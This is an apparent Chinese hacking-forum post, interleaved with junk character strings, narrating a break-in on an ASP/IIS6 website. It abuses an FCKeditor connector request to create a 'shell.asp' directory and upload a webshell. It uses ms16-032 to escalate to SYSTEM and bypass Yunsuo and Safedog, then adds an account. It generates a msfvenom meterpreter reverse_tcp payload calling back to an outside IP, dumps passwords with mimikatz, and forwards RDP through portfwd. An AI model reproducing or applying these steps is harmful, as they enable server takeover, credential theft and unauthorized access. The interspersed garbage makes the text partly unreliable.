|
; I- c! G8 S! k4 Q
2 v7 L8 D& g% U8 d# x
, z* \5 e# y+ k# O8 q' Y ! C1 c7 ^7 E% a5 i" d
| 0 ?! R4 A% T8 D3 ~* u5 ?. O
6 s* k9 _! A2 J2 Q4 l$ s" q, d5 U
6 Y+ a; R0 A' d; E6 U5 _
一、 利用getwebshell篇
% i9 I. k9 T% l) F0 c5 l1 v
; j) ]) z" x% u6 T首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
* v% o' E$ e. r& L2 Z/ {9 o
. S; X' U( t# ^8 \5 q4 k5 z6 u/ g7 f! @; N
( S+ L0 P+ ~. l. q! W下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
, ^) K; E' J+ j/ n- p0 w- l5 } ^
7 E# V1 ?3 p' _9 f2 H
下面我们构造一个asp目录,如:
" \. z! h) \, Q: B% F
2 E" }9 S1 m# _: D6 ~+ E
; I x& L' ?8 {' _# f9 a http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 " X( }- [( p3 B8 s1 U2 ~: ~
$ J5 K2 q2 s+ E9 N! v- C
' v% k1 \ i' Z# v! s" B+ Z! s 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
; Q W. B. [- i
% I2 a- L) F" Q" E# E
一、 绕过安全狗云锁提权并且加账号
, ]; v! p4 |/ g
6 `6 M2 s, T3 L4 w9 e" Y& s
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
: W( t( A) I! \; N) e, x9 w2 z# i
N) I9 H0 L4 {# ^3 |
如图:
) ?+ c6 l) Q' ?4 e; D2 f8 Q
+ P ^# M4 |' b0 v然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
# f' B" Y2 l6 L8 Q( q
4 N3 H' }8 c4 r8 c' T
一、 利用metasploit
^7 r1 [' S5 y# e* @& D6 j' I6 l
; m5 e! x7 S8 T; m+ _% s
首先用pentestbox生成一个64位的payload如下命令
' Y" H, F' |) {. }/ K9 Z
$ P( v# |5 H1 U b* y( J; u+ ymsfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
. y6 N! L: w. d) V( j) q( p8 x
1 s" r7 f( q; l. n为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
# s5 K' z1 }! H0 L
* p: @7 k9 ]/ m9 q5 L, w% m- b
下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图:
: @1 m$ x. R2 l1 @6 U$ n
9 H7 f& Q6 N- Y2 I8 f% w
下面我们来做一个监听如下命令:
8 Z S. I+ s7 E+ i8 C3 v
! I: t1 z$ D& [( |2 pportfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图:
% Z0 z8 j C, O9 h
. R5 I" ~1 Q2 ]2 P - [( h+ z4 `( q* _% {0 K4 N1 v
|
" o! U1 U& ~3 n2 |- s: r3 l ! z( G* v; _* R' `+ R
% H# o" r9 F( [5 r5 g0 p$ ` 7 M, k B, ]. r: K2 C3 `
- q) P& D% D$ g C* T3 J
) p! w( J8 q* v/ [3 a
9 [3 M2 z$ s. P1 k2 x% f
3 Z2 V+ Q+ _ v" W2 A/ S0 o! _ & |% G' @& `7 x9 R% A
2 W4 k; h; W; Z7 s! |: n
6 C. y8 R" E% o; X/ \ Y/ P' D/ y" P8 ]8 X: l+ E- s, |+ D
7 r; a! D3 ^; O2 H
" ^# R9 P' f7 W) G1 x | 
发表于 2018-10-20 20:31:43
收藏
支持
反对
匿名
发表于 2021-11-20 23:30:06